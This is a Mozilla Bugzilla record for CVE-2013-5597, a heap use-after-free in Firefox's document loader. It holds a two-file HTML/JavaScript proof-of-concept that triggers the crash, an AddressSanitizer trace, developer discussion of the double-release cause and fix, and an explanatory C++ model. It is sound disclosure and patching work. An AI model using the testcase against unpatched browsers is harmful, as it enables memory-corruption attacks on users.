Bug 918864 - (CVE-2013-5597) [FIX] Heap-use-after-free in nsDocLoader::doStopDocumentLoad()
Status: RESOLVED FIXED
Whiteboard: [asan][adv-main25+][adv-esr1710+][adv...
Keywords: csectype-uaf, regression, sec-critical
Product: Core
Classification: Components
Component: DOM
Version: Trunk
Platform: x86_64 Linux
Importance: -- normal
Target Milestone: mozilla27
Assigned To: Olli Pettay [:smaug]
Blocks: 471227
Reported: 2013-09-20 09:03 PDT by lifeasageek
Modified: 2015-02-25 20:16 PST
abillings: sec‑bounty+
cbook: in‑testsuite?

Attachments
patch (2.91 KB, patch)
2013-09-26 17:13 PDT, Olli Pettay [:smaug]
bzbarsky: review+
abillings: approval‑mozilla‑aurora+
abillings: approval‑mozilla‑beta+
abillings: approval‑mozilla‑esr24+
abillings: sec‑approval+

Description lifeasageek 2013-09-20 09:03:25 PDT
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36

Steps to reproduce:

Heap-use-after-free in nsDocLoader::doStopDocumentLoad().
Tested on asan firefox build (1377823661 and 1379548174) and 23.0 (crashed).
OS: Debian 7.1 and Ubuntu 10.04 LTS

Please put a.html and b.html in the same directory, and open a.html.


=== a.html ===
<html>
<script>
function killChildFrame() {
    window[0].home();
    document.body.removeChild(document.getElementsByTagName('iframe')[0]);
}
</script>
<iframe src="b.html"></iframe>
</html>

=== b.html ===
<html manifest="x">
<script>
window.applicationCache.onchecking = function() {
    parent.killChildFrame();
}
</script>
</html>

Actual results:

==18678==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060009b8100 at pc 0x7f3781adb4e0 bp 0x7fff04361db0 sp 0x7fff04361da8
READ of size 8 at 0x6060009b8100 thread T0
    #0 0x7f3781adb4df in ~nsCOMPtr /dist/include/nsCOMPtr.h:430
    #1 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #2 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #3 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #4 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #5 0x7f377f3b4106 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/netwerk/base/src/nsLoadGroup.cpp:687
    #6 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #7 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #8 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #9 0x7f37804e53bc in nsRunnableMethodImpl<void (nsDocument::*)(), true>::Run() /dist/include/nsThreadUtils.h:363
    #10 0x7f37836d4ba9 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/threads/nsThread.cpp:622
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
0x6060009b8100 is located 0 bytes inside of 64-byte region [0x6060009b8100,0x6060009b8140)
freed by thread T0 here:
    #0 0x446015 in __interceptor_free _asan_rtl_
    #1 0x7f3781b4791d in nsAutoRefCnt::operator=(unsigned int) /dist/include/mozilla/mozalloc.h:225
    #2 0x7f3781adb34f in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:1331
    #3 0x7f3781ada6a3 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:865
    #4 0x7f3781ad832f in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:755
    #5 0x7f3781ad98aa in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:639
    #6 0x7f3781ada159 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-asan-000000000000000/build/uriloader/base/nsDocLoader.cpp:642
    #7 0x7f37804bfdaa in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7999
    #8 0x7f37804bf8af in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:7927
    #9 0x7f378049e862 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsDocument.cpp:4713
    #10 0x7f37804e53bc in nsRunnableMethodImpl<void (nsDocument::*)(), true>::Run() /dist/include/nsThreadUtils.h:363
    #11 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #12 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #13 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #14 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #15 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #16 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #17 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #18 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #19 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #20 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #21 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #22 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #23 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #24 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #25 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #26 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #27 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #28 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #29 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
previously allocated by thread T0 here:
    #0 0x446155 in __interceptor_malloc _asan_rtl_
    #1 0x7f378865b5c8 in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f37803d493e in nsContentSink::ProcessOfflineManifest(nsAString_internal const&) /builds/slave/m-cen-l64-asan-000000000000000/build/content/base/src/nsContentSink.cpp:1108
    #3 0x7f378127360b in nsHtml5SpeculativeLoad::Perform(nsHtml5TreeOpExecutor*) /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5SpeculativeLoad.cpp:45
    #4 0x7f37813095f7 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5TreeOpExecutor.cpp:507
    #5 0x7f3781283288 in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/parser/html/nsHtml5StreamParser.cpp:131
    #6 0x7f37835fe016 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
    #7 0x7f3781c36dbc in nsXULWindow::ShowModal() /builds/slave/m-cen-l64-asan-000000000000000/build/xpfe/appshell/src/nsXULWindow.cpp:365
    #8 0x7f3781b79015 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:998
    #9 0x7f3781b74558 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) /builds/slave/m-cen-l64-asan-000000000000000/build/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:344
    #10 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #11 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #12 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #13 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #14 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #15 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #16 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
    #17 0x7f3784f6f298 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:539
    #18 0x7f378517fce7 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jsapi.cpp:5420
    #19 0x7f3781997416 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1445
    #20 0x7f378198ab3f in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedJS.cpp:587
    #21 0x7f378371d73a in PrepareAndDispatch /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122
    #22 0x7f378371c786 in SharedStub /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #23 0x7f378371c551 in NS_InvokeByIndex /builds/slave/m-cen-l64-asan-000000000000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #24 0x7f37819aa26e in CallMethodHelper::Invoke() /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2809
    #25 0x7f37819bbfbb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1316
    #26 0x7f3784f6e27a in JSFunction::native() const /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/jscntxtinlines.h:219
    #27 0x7f3784f61352 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:2484
    #28 0x7f3784f4fd51 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:446
    #29 0x7f3784f6e4b3 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/js/src/vm/Interpreter.cpp:508
Shadow bytes around the buggy address:
==18678==ABORTING
Comment 1 Andrew McCreight [:mccr8] 2013-09-23 09:35:18 PDT
I'll take a first look at this.
Comment 2 lifeasageek 2013-09-23 10:19:05 PDT
Andrew@ Thanks. Please let me know if there's anything I can help you with.
Comment 3 Andrew McCreight [:mccr8] 2013-09-24 09:32:17 PDT
I wasn't able to reproduce this on trunk. I'll try again.
Comment 4 Al Billings [:abillings] 2013-09-25 10:19:36 PDT
Matt, can you try reproducing this in a current ASAN build?
Comment 5 Daniel Veditz [:dveditz] 2013-09-25 10:21:47 PDT
On the face of it, this looks sec-critical if we can confirm it still happens.
Comment 6 lifeasageek 2013-09-25 11:45:15 PDT
Just tested on the latest asan build (https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1380106412/) and it triggered use-after-free with the same crash footage.
Comment 7 Olli Pettay [:smaug] 2013-09-25 15:04:50 PDT
Does one need to load the testcase from a server or should a local file be ok?
Comment 8 Olli Pettay [:smaug] 2013-09-25 15:07:56 PDT
Looks like loading from a server is needed. I have this in the debugger.
Comment 9 Olli Pettay [:smaug] 2013-09-26 17:13:20 PDT
Created attachment 810872 [details] [diff] [review]
patch

This is a regression from bug 471227, so rather old.

We end up calling nsOfflineCachePendingUpdate::OnStateChange nestedly, so that
mService->Schedule calls it again. The object is kept alive on stack, but
since NS_RELEASE_THIS() is called more than once, calling Release when
the strong pointer on the stack goes away crashes.

Couldn't figure out anything simpler given the odd refcnt handling.

(I think nsDocLoader should just keep this kind of webprogresslisteners alive in a
strong array, but that would require quite a bit more changes and wouldn't be
safe enough for branches.)
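The over-release smaug describes, as an added example (not the page's code and not Gecko's): a refcounted listener whose OnStateChange() is re-entered through the service it schedules, shown unguarded and with a "don't do it twice" flag. UpdateService, PendingUpdate, mScheduled and mDidSchedule are hypothetical stand-ins for the real classes and for the flag the patch adds.

```cpp
// Added example, not Gecko code: a model of the double NS_RELEASE_THIS()
// from comment 9. The listener owns one self-reference and drops it when
// told about STATE_STOP; the service it notifies calls back into
// OnStateChange() first, so without a guard the self-reference is dropped
// twice and the caller's stack-held reference releases a freed object.
#include <cstdio>

enum State { STATE_START = 1, STATE_STOP = 2 };
struct PendingUpdate;

// Hypothetical stand-in for the update service (mService in the report).
struct UpdateService {
    int mScheduled = 0;
    void Schedule(PendingUpdate* update);
};

// Hypothetical stand-in for nsOfflineCachePendingUpdate.
struct PendingUpdate {
    UpdateService* mService;
    bool mGuarded;               // true = patched behaviour: handle stop once
    bool mDidSchedule = false;   // the guard flag itself
    int mRefCnt = 1;             // the listener's own self-reference
    bool mDestroyed = false;     // set when the count reaches zero ("freed")
    int mReleasesAfterFree = 0;  // Release() calls on the freed object
    PendingUpdate(UpdateService* s, bool g) : mService(s), mGuarded(g) {}
    void AddRef() { ++mRefCnt; }
    // Models NS_RELEASE(): a Release() after the count hit zero is the
    // use-after-free that ASan reported from ~nsCOMPtr.
    void Release() {
        if (mDestroyed) { ++mReleasesAfterFree; return; }
        if (--mRefCnt == 0) mDestroyed = true;
    }
    void OnStateChange(int state) {
        if (!(state & STATE_STOP)) return;
        if (mGuarded) {
            if (mDidSchedule) return;   // the fix: never do this twice
            mDidSchedule = true;
        }
        mService->Schedule(this);       // re-enters OnStateChange() below
        Release();                      // NS_RELEASE_THIS(): drop self-reference
    }
};

void UpdateService::Schedule(PendingUpdate* update) {
    // Modelled on the report: the first Schedule() notifies the listener of
    // STATE_STOP again while the outer OnStateChange() is still on the stack.
    if (mScheduled++ == 0) update->OnStateChange(STATE_STOP);
}

// Models nsDocLoader::doStopDocumentLoad(): a strong pointer on the stack
// (nsCOMPtr) holds the listener across the notification and releases it at
// scope exit. Returns how many releases touched the already-freed object.
int NotifyStopWithStackRef(PendingUpdate& update) {
    update.AddRef();                    // nsCOMPtr takes its reference
    update.OnStateChange(STATE_STOP);
    update.Release();                   // ~nsCOMPtr
    return update.mReleasesAfterFree;
}

int UnpatchedReleasesAfterFree() {
    UpdateService svc;
    PendingUpdate u(&svc, /*guarded=*/false);
    return NotifyStopWithStackRef(u);   // 1: the stack reference hits freed memory
}

int PatchedReleasesAfterFree() {
    UpdateService svc;
    PendingUpdate u(&svc, /*guarded=*/true);
    return NotifyStopWithStackRef(u);   // 0: each reference released exactly once
}

int main() {
    std::printf("unpatched: %d release(s) after free\n", UnpatchedReleasesAfterFree());
    std::printf("patched:   %d release(s) after free\n", PatchedReleasesAfterFree());
}
```

The model counts the post-free Release() instead of touching freed memory, so it runs cleanly; under ASan the real code turns that same extra Release() into the heap-use-after-free in ~nsCOMPtr shown above.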
Comment 10 Boris Zbarsky [:bz] 2013-09-26 18:20:41 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

r=me
Comment 11 Olli Pettay [:smaug] 2013-09-26 18:31:01 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

[Approval Request Comment]
Bug caused by (feature/regressing bug #): bug 471227
User impact if declined: Crashes
Testing completed (on m-c, etc.): NA
Risk to taking this patch (and alternatives if risky): Should be very safe. Adding a flag that we don't do a thing twice
String or IDL/UUID changes made by this patch: NA

How easily could an exploit be constructed based on the patch?
Not sure about the exploit, but a crash might be quite easy to get.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Unfortunately the patch makes it very clear what kind of problem this is about.

Which older supported branches are affected by this flaw?
all

Do you have backports for the affected branches?
The patch seems to apply cleanly to branches

How likely is this patch to cause regressions; how much testing does it need?
Should be very safe.

So, in other words, I think this could land as late in a cycle as possible.
Comment 12 Al Billings [:abillings] 2013-09-27 10:14:13 PDT
I have no problems sec-approval+'ing this but I want release management to weigh in since we'll need to take this on Aurora and Beta (and ESR24 and maybe ESR17, which is still supported). What I need from them specifically is how late they are comfortable checking this in since it clearly demonstrates the issue. Since this is a safe fix, it shouldn't affect stability really.

I'm assuming B2G is affected too.
Comment 13 Lukas Blakk [:lsblakk] use ?needinfo 2013-09-27 11:50:30 PDT
We should be able to land this on 10/17 to get it into our second-to-last Beta (and then elsewhere too) to minimize exposure but also give one extra release's buffer if we needed to backout for any reason - though this is expected to be safe.
Comment 14 Al Billings [:abillings] 2013-09-27 12:23:47 PDT
Comment on attachment 810872 [details] [diff] [review]
patch

Setting unset branch approval flags and giving sec-approval+.

We should take this on ESR17 too if the patch applies since we are still supporting that for another two releases.
Comment 16 Ryan VanderMeulen [:RyanVM] 2013-10-17 11:01:05 PDT
https://hg.mozilla.org/integration/mozilla-inbound/rev/e0daf4f7c665
Comment 19 Carsten Book [:Tomcat] 2013-10-18 03:42:10 PDT
https://hg.mozilla.org/mozilla-central/rev/e0daf4f7c665
Comment 20 Matt Wobensmith [:mwobensmith][:matt:] 2013-10-21 17:06:20 PDT
Confirmed crash on pre-patch ASan FF27.
Verified fixed on ASan builds of 24esr, 25, 26 and 27, 2013-10-21.

Can't build ASan 17esr at the moment, will verify that in a day or two.
Comment 21 Matt Wobensmith [:mwobensmith][:matt:] 2013-10-23 11:37:43 PDT
Verified 17esr, 2013-10-23.
